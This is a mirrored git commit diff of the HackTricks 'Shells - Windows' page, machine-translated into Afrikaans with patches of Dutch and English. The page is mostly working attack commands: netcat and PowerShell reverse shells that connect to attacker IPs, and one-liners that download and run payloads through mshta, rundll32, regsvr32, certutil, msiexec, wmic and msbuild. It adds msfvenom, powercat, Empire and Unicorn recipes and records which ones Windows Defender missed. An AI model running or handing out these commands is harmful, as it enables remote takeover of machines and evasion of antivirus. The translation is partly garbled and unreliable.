Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-16 14:08:26 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['generic-methodologies-and-resources/shells/windows.md'] to

Browse source
This commit is contained in:
Translator 2024-08-14 08:52:36 +00:00
parent 9b0b9658dc
commit ac73077cb6
1 changed files with 82 additions and 76 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

158
generic-methodologies-and-resources/shells/windows.md
View file

@ -1,21 +1,21 @@
# Skulpe - Windows
# Shells - Windows
{% hint style="success" %}
Leer & oefen AWS Hack: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Leer & oefen GCP Hack: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Opleiding GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Ondersteun HackTricks</summary>
* Kontroleer die [**inskrywingsplanne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
* Kyk na die [**subskripsie planne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
**Probeer Hard Security Groep**
**Probeer Hard Sekuriteitsgroep**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
@ -25,16 +25,29 @@ Leer & oefen GCP Hack: <img src="/.gitbook/assets/grte.png" alt="" data-size="li
## Lolbas
Die bladsy [lolbas-project.github.io](https://lolbas-project.github.io/) is vir Windows soos [https://gtfobins.github.io/](https://gtfobins.github.io/) is vir Linux.\
Duidelik, **daar is nie SUID-lêers of sudo-voorregte in Windows nie**, maar dit is nuttig om te weet **hoe** sommige **binêre lêers** (mis)bruik kan word om sekere soorte onverwagte aksies uit te voer soos **die uitvoer van arbitrêre kode.**
Die bladsy [lolbas-project.github.io](https://lolbas-project.github.io/) is vir Windows soos [https://gtfobins.github.io/](https://gtfobins.github.io/) vir linux.\
Dit is duidelik, **daar is geen SUID lêers of sudo regte in Windows nie**, maar dit is nuttig om te weet **hoe** sommige **binaries** (mis)bruik kan word om 'n soort onverwagte aksies uit te voer soos **arbitraire kode uit te voer.**
## NC
```bash
nc.exe -e cmd.exe <Attacker_IP> <PORT>
```
## NCAT
slagoffer
```
ncat.exe <Attacker_IP> <PORT> -e "cmd.exe /c (cmd.exe 2>&1)"
#Encryption to bypass firewall
ncat.exe <Attacker_IP> <PORT eg.443> --ssl -e "cmd.exe /c (cmd.exe 2>&1)"
```
aanvaller
```
ncat -l <PORT>
#Encryption to bypass firewall
ncat -l <PORT eg.443> --ssl
```
## SBD
**[sbd](https://www.kali.org/tools/sbd/) is 'n draagbare en veilige Netcat-alternatief**. Dit werk op Unix-soortgelyke stelsels en Win32. Met kenmerke soos sterk enkripsie, program uitvoering, aanpasbare bronpoorte, en voortdurende herverbinding, bied sbd 'n veelsydige oplossing vir TCP/IP kommunikasie. Vir Windows-gebruikers kan die sbd.exe weergawe van die Kali Linux-verspreiding gebruik word as 'n betroubare vervanging vir Netcat.
**[sbd](https://www.kali.org/tools/sbd/) is 'n draagbare en veilige Netcat alternatief**. Dit werk op Unix-agtige stelsels en Win32. Met funksies soos sterk versleuteling, programuitvoering, aanpasbare bronpoorte, en deurlopende herverbinding, bied sbd 'n veelsydige oplossing vir TCP/IP kommunikasie. Vir Windows gebruikers kan die sbd.exe weergawe van die Kali Linux verspreiding as 'n betroubare vervanging vir Netcat gebruik word.
```bash
# Victims machine
sbd -l -p 4444 -e bash -v -n
@ -73,16 +86,7 @@ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -node
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response
```
## Sluit aan by 'n Windows-skootrekenaar
Om 'n skootrekenaar te koppel, kan jy die volgende stappe volg:
1. **Gebruik 'n afstandbeheerstelsel**: Maak gebruik van sagteware soos TeamViewer, AnyDesk of UltraVNC om afstandbeheer oor die skootrekenaar te verkry.
2. **Trojaanse perd installeer**: Installeer 'n trojaanse perd op die slagoffer se rekenaar om toegang te kry en beheer oor die stelsel te neem.
3. **Verbindingsopdrag gebruik**: Maak gebruik van gereedskap soos `netcat` of `nc` om 'n verbindingsopdrag na die slagoffer se IP-adres en poort te skep.
4. **Versteekte skootrekenaar**: Skep 'n versteekte skootrekenaar wat agter die slagoffer se rug loop en jou toegang tot die stelsel gee sonder dat hulle bewus is daarvan.
Onthou altyd om etiese riglyne te volg en slegs toestemming te verkry om toegang tot 'n skootrekenaar te verkry indien dit wettig is.
Slachtoffer
```bash
#Linux
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
@ -98,20 +102,22 @@ Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadStr
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile
```
Proses wat netwerkoproep uitvoer: **powershell.exe**\
Lading geskryf op skyf: **GEEN** (_ten minste nêrens kon ek vind deur procmon te gebruik!_)
Payload op skyf geskryf: **NEE** (_ten minste nêrens waar ek met procmon kon vind!_)
```bash
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
```
Proses wat netwerkoproep uitvoer: **svchost.exe**\
Lading geskryf op skyf: **WebDAV-klient plaaslike cache**
Payload op skyf geskryf: **WebDAV-kliënt plaaslike kas**
**Een-liner:**
```bash
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
**Kry meer inligting oor verskillende Powershell-Skille aan die einde van hierdie dokument**
**Kry meer inligting oor verskillende Powershell-selle aan die einde van hierdie dokument**
## Mshta
* [Van hier af](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
* [Van hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
```
@ -123,15 +129,15 @@ mshta http://webserver/payload.hta
```bash
mshta \\webdavserver\folder\payload.hta
```
#### **Voorbeeld van hta-psh omgekeerde dop (gebruik hta om PS agterdeur af te laai en uit te voer)**
#### **Voorbeeld van hta-psh omgekeerde skulp (gebruik hta om PS agterdeur af te laai en uit te voer)**
```xml
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>
```
**Jy kan baie maklik 'n Koadic zombie aflaai en uitvoer deur die stager hta te gebruik**
**Jy kan baie maklik 'n Koadic zombie aflaai en uitvoer met die stager hta**
#### hta voorbeeld
[**Van hier af**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f)
[**Van hier**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f)
```xml
<html>
<head>
@ -148,7 +154,7 @@ new ActiveXObject('WScript.Shell').Run(c);
```
#### **mshta - sct**
[**Van hier af**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
[**Van hier**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
```xml
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
@ -175,7 +181,7 @@ msf exploit(windows/misc/hta_server) > exploit
```bash
Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit
```
**Opgespoor deur verdediger**
**Gevind deur verdediger**
@ -192,11 +198,11 @@ rundll32 \\webdavserver\folder\payload.dll,entrypoint
```bash
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
```
**Opgespoor deur verdediger**
**Gevind deur verdediger**
**Rundll32 - sct**
[**Van hier af**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
[**Van hier**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
```xml
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
@ -228,7 +234,7 @@ rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject(
```
## Regsvr32
* [Van hier af](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
* [Van hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
```
@ -236,11 +242,11 @@ regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
```
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
```
**Opgespoor deur verdediger**
**Gedig deur verdediger**
#### Regsvr32 -sct
[**Van hier af**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1)
[**Van hier**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1)
```markup
<?XML version="1.0"?>
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
@ -266,21 +272,21 @@ set lhost 10.2.0.5
run
#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll
```
**Jy kan baie maklik 'n Koadic zombie aflaai en uitvoer deur die stager regsvr te gebruik**
**Jy kan baie maklik 'n Koadic zombie aflaai en uitvoer met die stager regsvr**
## Certutil
* [Van hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
Laai 'n B64dll af, ontsluit dit en voer dit uit.
Laai 'n B64dll af, dekodeer dit en voer dit uit.
```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
```
Laai 'n B64exe af, ontsluit dit en voer dit uit.
Laai 'n B64exe af, dekodeer dit en voer dit uit.
```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
```
**Opgespoor deur verdediger**
**Gevind deur verdediger**
## **Cscript/Wscript**
@ -291,14 +297,14 @@ powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0
```bash
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs
```
**Opgespoor deur verdediger**
**Gevind deur verdediger**
## PS-Bat
```bash
\\webdavserver\folder\batchfile.bat
```
Proses wat netwerkoproep uitvoer: **svchost.exe**\
Lading geskryf op skyf: **WebDAV-klient plaaslike cache**
Payload op skyf geskryf: **WebDAV-kliënt plaaslike kas**
```bash
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat
impacket-smbserver -smb2support kali `pwd`
@ -307,7 +313,7 @@ impacket-smbserver -smb2support kali `pwd`
```bash
\\10.8.0.3\kali\shell.bat
```
**Opgespoor deur verdediger**
**Gevind deur verdediger**
## **MSIExec**
@ -316,15 +322,15 @@ Aanvaller
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi
python -m SimpleHTTPServer 80
```
### Slagoffer:
Slachtoffer:
```
victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi
```
**Opgespoor**
**Gevind**
## **Wmic**
* [Van hier af](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
* [Van hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash
wmic os get /format:"https://webserver/payload.xsl"
```
@ -340,36 +346,36 @@ var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object N
</ms:script>
</stylesheet>
```
**Nie opgespoor nie**
**Nie gedetecteer nie**
**Jy kan baie maklik 'n Koadic zombie aflaai en uitvoer deur die stager wmic te gebruik**
**Jy kan baie maklik 'n Koadic zombie aflaai en uitvoer met die stager wmic**
## Msbuild
* [Van hier af](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
* [Van hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
```
Jy kan hierdie tegniek gebruik om Toepassingswitlysing en Powershell.exe-beperkings te omseil. Aangesien jy met 'n PS-skul gekonfronteer sal word.\
Net aflaai en uitvoer dit: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj)
U kan hierdie tegniek gebruik om toepassingswitlys en Powershell.exe-beperkings te omseil. U sal met 'n PS-skal gevra word.\
Laai net dit af en voer dit uit: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj)
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj
```
**Nie opgespoor nie**
**Nie gedetecteer nie**
## **CSC**
Kompileer C#-kode in die slagoffer se masjien.
Kompileer C# kode in die slagoffer masjien.
```
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs
```
Jy kan 'n basiese C# omgekeerde dop van hier af aflaai: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc)
You can download a basic C# reverse shell from here: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc)
**Nie opgespoor nie**
**Nie gedetecteer nie**
## **Regasm/Regsvc**
* [Van hier af](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
* [Van hier](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
```
@ -387,21 +393,21 @@ odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
[**https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2**](https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2)
## Powershell Doppe
## Powershell Skale
### PS-Nishang
[https://github.com/samratashok/nishang](https://github.com/samratashok/nishang)
In die **Doppe**-vouer is daar baie verskillende doppe. Om Invoke-_PowerShellTcp.ps1_ af te laai en uit te voer, maak 'n kopie van die skripsie en voeg dit aan die einde van die lêer by:
In die **Skale** gids, is daar 'n klomp verskillende skale. Om Invoke-_PowerShellTcp.ps1_ te aflaai en uit te voer, maak 'n kopie van die skrif en voeg by die einde van die lêer:
```
Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444
```
Begin deur die skrip op 'n webbediener te bedien en voer dit uit aan die slagoffer se kant:
Begin om die skrip op 'n webbediener te bedien en voer dit aan die slagoffer se kant uit:
```
powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"
```
Verdediger beskou dit nie as skadelike kode nie (nog nie, 3/04/2019).
Defender detecteer dit nie as kwaadwillige kode nie (nog, 3/04/2019).
**TODO: Kontroleer ander nishang shells**
@ -409,15 +415,15 @@ Verdediger beskou dit nie as skadelike kode nie (nog nie, 3/04/2019).
[**https://github.com/besimorhino/powercat**](https://github.com/besimorhino/powercat)
Laai af, begin 'n webbediener, begin die luisteraar, en voer dit aan die slagoffer se kant uit:
Laai af, begin 'n webbediener, begin die luisteraar, en voer dit op die slagoffer se kant uit:
```
powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
```
Defender ken dit nie as skadelike kode opspoor nie (nog nie, 3/04/2019).
Defender detecteer dit nie as kwaadwillige kode nie (nog, 3/04/2019).
**Ander opsies wat deur powercat aangebied word:**
Bind doppe, Omgekeerde dop (TCP, UDP, DNS), Poort omleiding, oplaai/aflaai, Genereer vragte, Bedien lêers...
Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, upload/download, Generate payloads, Serve files...
```
Serve a cmd Shell:
powercat -l -p 443 -e cmd
@ -434,21 +440,21 @@ powercat -c 10.1.1.15 -p 443 -e cmd -g
Start A Persistent Server That Serves a File:
powercat -l -p 443 -i C:\inputfile -rep
```
### Rykdom
### Empire
[https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire)
Skep 'n powershell-aanroeper, stoor dit in 'n lêer en laai dit af en voer dit uit.
Skep 'n powershell-lancer, stoor dit in 'n lêer en laai dit af en voer dit uit.
```
powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
```
**Opgespoor as skadelike kode**
**Gedig as kwaadwillige kode**
### MSF-Eenhoorn
### MSF-Unicorn
[https://github.com/trustedsec/eenhoorn](https://github.com/trustedsec/eenhoorn)
[https://github.com/trustedsec/unicorn](https://github.com/trustedsec/unicorn)
Skep 'n powershell weergawe van metasploit agterdeur deur eenhoorn
Skep 'n powershell weergawe van metasploit agterdeur met behulp van unicorn
```
python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443
```
@ -456,17 +462,17 @@ Begin msfconsole met die geskepte hulpbron:
```
msfconsole -r unicorn.rc
```
Begin deur 'n webbediener te begin wat die _powershell\_attack.txt_ lêer bedien en voer uit op die slagoffer:
Begin 'n webbediener wat die _powershell\_attack.txt_ lêer bedien en voer uit in die slagoffer:
```
powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"
```
**Opgespoor as skadelike kode**
**Gedig as kwaadwillige kode**
## Meer
[PS>Aanval](https://github.com/jaredhaight/PSAttack) PS-konsole met 'n paar aanvallige PS-modules wat vooraf gelaai is (gekodeer)\
[PS>Attack](https://github.com/jaredhaight/PSAttack) PS-konsol met 'n paar offensiewe PS-modules vooraf gelaai (gecyfer)\
[https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c)[\
WinPWN](https://github.com/SecureThisShit/WinPwn) PS-konsole met 'n paar aanvallige PS-modules en proksie-opsporing (IEX)
WinPWN](https://github.com/SecureThisShit/WinPwn) PS-konsol met 'n paar offensiewe PS-modules en proxy-detektering (IEX)
## Verwysings
@ -478,23 +484,23 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) PS-konsole met 'n paar aanvall
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
* [https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
**Probeer Hard Security Group**
**Probeer Hard Sekuriteitsgroep**
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
Leer & oefen AWS-hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Leer & oefen GCP-hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Opleiding GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Ondersteun HackTricks</summary>
* Kontroleer die [**inskrywingsplanne**](https://github.com/sponsors/carlospolop)!
* Kyk na die [**subskripsieplanne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
* **Deel hacking truuks deur PR's in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}